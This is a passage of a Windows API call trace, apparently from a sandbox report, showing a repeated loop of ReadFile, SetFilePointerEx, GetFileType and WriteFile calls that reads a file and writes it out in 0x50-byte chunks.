returned 0x50 [0128.209] GetFileType (hFile=0x50) returned 0x1 [0128.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.209] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] GetFileType (hFile=0x50) returned 0x1 [0128.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.210] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.210] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.210] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.211] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] GetFileType (hFile=0x50) returned 0x1 [0128.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.211] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.212] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.212] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.212] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] GetFileType (hFile=0x50) returned 0x1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.213] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.213] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.213] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] GetFileType (hFile=0x50) returned 0x1 [0128.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.214] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.215] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.215] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] GetFileType (hFile=0x50) returned 0x1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.215] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.216] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.216] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.216] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.218] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.218] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.219] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.219] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: 